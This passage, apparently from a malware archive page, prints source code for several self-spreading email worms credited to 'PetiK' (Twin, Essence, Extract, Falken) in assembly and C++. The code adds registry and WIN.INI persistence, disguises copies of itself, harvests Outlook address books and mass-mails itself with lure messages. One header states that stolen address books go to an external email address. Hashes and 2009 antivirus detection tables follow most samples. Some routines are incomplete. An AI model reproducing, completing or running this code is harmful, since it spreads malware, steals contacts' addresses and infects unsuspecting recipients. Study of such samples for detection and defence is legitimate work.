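        print(name, describe(blob))
```

Hashing the decoded blob rather than the document or the .vbs is what lets the dropped binary be matched against the sample records elsewhere on this page, since those hashes are of the executable itself.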
comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end
Additional information
File size: 6656 bytes
MD5...: 3da254ab9def856d64f0779ea6a6057f
SHA1..: 31a005985a793d2b8e84dd747c3fa17c721ddf60
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
File Twin.doc received on 05.16.2009 19:41:06 (CET)
Additional information
File size: 65536 bytes
MD5...: 079275bdaf0058642f3b062b3aef4de3
SHA1..: 0fe4a31077176828ec545b7ca3c5e92ea59a7352
SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595
/*
Name : I-Worm.Essence
Author : PetiK
Date : February 3rd 2002
Language : C++
Thanx to Bumblebee.
*/
#include <windows.h>
#include <mapi.h>
#include <memory.h>
#pragma argused
void Welcome();
void attachname();
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr);
char filename[100],sysdir[100],sysdr[100],attname[20];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
HINSTANCE hMAPI;
LHANDLE sess;
MapiMessage *mess;
char messId[512];
char subject[1024],
address[1024],
server[1024],
body[8192];
long i,j;
char *tmp;
MSG msg;
HKEY hReg;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSIE32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
strcat(sysdir,"\\Msie32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
// WriteProfileString("WINDOWS","RUN",sysdir);
// WriteProfileString(NULL,NULL,NULL);
return 0;
}
hMAPI=LoadLibrary("MAPI32.DLL");
if(!hMAPI)
return -1;
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
if(!mLogon)
return -1;
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
if(!mLogoff)
return -1;
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
if(!mFindNext)
return -1;
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
if(!mReadMail)
return -1;
(FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail");
if(!mSaveMail)
return -1;
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
if(!mSendMail)
return -1;
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
if(!mFreeBuffer)
return -1;
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
while(GetMessage(&msg,NULL,0,0))
if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
if(lstrlen(mess->lpszSubject)>2)
if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess->lpszSubject[strlen(mess->lpszSubject)-2]!=' ') {
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST);
if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
body[0]=0;
if(mess->lpszNoteText) {
wsprintf(body,"Hi '%s', you wrote me :\n##########\n- ",mess->lpOriginator->lpszName);
for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) {
body[j]=mess->lpszNoteText[i];
if(body[j]=='\n') {
body[j]=0;
lstrcat(body,"\n- ");
j+=2;
}
}
body[j]=0;
}
for(i=0;j<lstrlen(address) && address[i]!='@';i++);
if(i>lstrlen(address))
wsprintf(body,"smtp.%s",address+i+1);
else
wsprintf(body,"smtp.yahoo.com");
if(j>=512)
lstrcat(body,"...");
else
lstrcat(body," ");
wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server);
lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if you have some suggests.\n\n");
wsprintf(subject,"Re: %s ",mess->lpszSubject);
wsprintf(address,"%s",mess->lpOriginator->lpszAddress);
MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION);
sendmail(sess,subject,body,address);
tmp=(char *)malloc(strlen(mess->lpszSubject)+3);
strcpy(tmp,mess->lpszSubject);
free(mess->lpszSubject);
tmp[strlen(tmp)+2]=0;
tmp[strlen(tmp)]=' ';
tmp[strlen(tmp)-1]=' ';
mess->lpszSubject=tmp;
mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId);
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
}
} else
mFreeBuffer(mess);
}
} while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS);
}
mLogoff(sess,0,0,0);
FreeLibrary(hMAPI);
}
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr)
{
char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday",
"hello","ForU","important"};
char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs",
".zip",".rar"};
char *ext2[]={".exe",".com",".pif",".scr"};
attname[0]=0;
strcat(attname,name[GetTickCount()&8]);
strcat(attname,ext1[GetTickCount()&10]);
strcat(attname,ext2[GetTickCount()&3]);
MapiMessage mes;
MapiRecipDesc from;
memset(&mes,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mes.lpszSubject=msubject;
mes.lpszNoteText=mbody;
mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mes.lpRecips)
return;
memset(mes.lpRecips,0,sizeof(MapiRecipDesc));
mes.lpRecips->lpszName=mailaddr;
mes.lpRecips->lpszAddress=mailaddr;
mes.lpRecips->ulRecipClass=MAPI_TO;
mes.nRecipCount=1;
mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mes.lpFiles)
return;
memset(mes.lpFiles,0,sizeof(MapiFileDesc));
mes.lpFiles->lpszPathName=filename;
mes.lpFiles->lpszFileName=attname;
mes.nFileCount=1;
mes.lpOriginator=&from;
mSendMail(sess,0,&mes,0,0);
free(mes.lpRecips);
free(mes.lpFiles);
}
void Welcome()
{
Sleep(750);
MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION);
}
File Essence.scr received on 05.16.2009 11:31:23 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Stopin.worm.24064
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.C
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.15 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Stopin-B
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.c
ClamAV 0.94.1 2009.05.15 Worm.Stopin.C
Comodo 1157 2009.05.08 Worm.Win32.Stopin.C
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.50688
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.c
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.A
F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.c
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.C!worm
GData 19 2009.05.16 Win32.StopIn.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Stopin.c
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.c
McAfee 5616 2009.05.15 W32/Stopin.c@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.c@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.C
Microsoft 1.4602 2009.05.16 Worm:Win32/Stopin.C@mm
NOD32 4080 2009.05.15 Win32/Stopin.C
Norman 6.01.05 2009.05.16 W32/Stopin.C@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.24064
Panda 10.0.0.14 2009.05.15 W32/Stopin.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Stopin.C
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Stopin.c
Sophos 4.41.0 2009.05.16 W32/Stopin-B
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.c
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.c
TrendMicro 8.950.0.1092 2009.05.15 WORM_STOPIN.B
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Essence
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.C
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Stopin.C
Additional information
File size: 24064 bytes
MD5...: c5ca2b9bea18766448b54c7ecd4c887c
SHA1..: 108ca819544e528b345e8afbc561b1ecda720102
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
Extract API from DLL directly (the reason for the name of the worm)
Copy itself to %SYSDIR%\UPDATEW32.EXE
Create "RUN=" in WIN.INI to start with the computer
Display fake message
Send the Outlook WAB (address book) to extractcounter@multimania.com
Take these addresses to spread itself with MAPI functions.
On the 29th, display a message box
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
include myinclude.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat
push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est très important",CRLF,CRLF
db 9,"Mes sincères salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?
end start_worm
end
File Extract.exe received on 05.16.2009 11:58:04 (CET)
Additional information
File size: 5632 bytes
MD5...: f6c5adc3869b24363a81d283908a9978
SHA1..: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Falken
Author : PetiK
Date : February 5th 2002 - February 8th 2002
Size : 6144
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetTickCount
kern GetWindowsDirectoryA
kern lstrcat
kern MapViewOfFile
kern SetCurrentDirectoryA
kern SetFilePointer
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WritePrivateProfileStringA
kern WriteProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
call _ptkGetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
call _ptkGetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
call _ptkGetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
call _ptkSleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 50
push offset wininit
call _ptkGetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
call _ptklstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
call _ptkWritePrivateProfileStringA
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
call _ptkSetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
call _ptkCopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
payload:
call _ptkGetTickCount
xor edx,edx
mov ecx,20
div ecx
cmp edx,2
jne end_payload
push 10h
@pushsz "I-Worm.Falken"
call @messpay
db "This is the last warning before the attack.",CRLF
db "United States have to stop controling the world.",0
@messpay:
push 0
api MessageBoxA
end_payload:
prep_spread_worm:
push 0
push 20h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\falken.vbs"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push 1
@pushsz "wscript C:\falken.vbs"
call _ptkWinExec
push 2000
call _ptkSleep
@pushsz "C:\falken.vbs"
call _ptkDeleteFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset syspath
call _ptkGetSystemDirectoryA
push offset syspath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "falkenspread.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: mov counter,0
end_l: xor al,al
stosb
inc counter
cmp counter,20
jne end_l
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
push 0
push 80h
push 4
push 0
push 1
push 40000000h
@pushsz "falkenliste.txt"
call _ptkCreateFileA
xchg eax,ebx
push 2
push 0
push 0
push ebx
call _ptkSetFilePointer
push 0
push offset octets
push e_liste - s_liste
push offset s_liste
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
ret
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)
lect db 50 dup (0)
syspath db 50 dup (0)
octets dd ?
counter dd ?
inet dd 0
sess dd 0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetTickCount db "GetTickCount",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSetFilePointer db "SetFilePointer",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetTickCount dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSetFilePointer dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWritePrivateProfileStringA dd ?
_ptkWriteProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
s_liste:
db "mailto : > "
mail_addr db 50 dup (0)
db " ",CRLF
e_liste:
end start_worm
end
File Falken.exe received on 05.16.2009 11:58:11 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Pettick.worm.6144
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Falkon
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.G@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AC
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Falcon.A
F-Prot 4.4.4.56 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.G@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Z@mm
NOD32 4080 2009.05.15 Win32/Petik.AC
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6144.C
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6144
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.B
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.j
Sophos 4.41.0 2009.05.16 W32/Petik-P
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
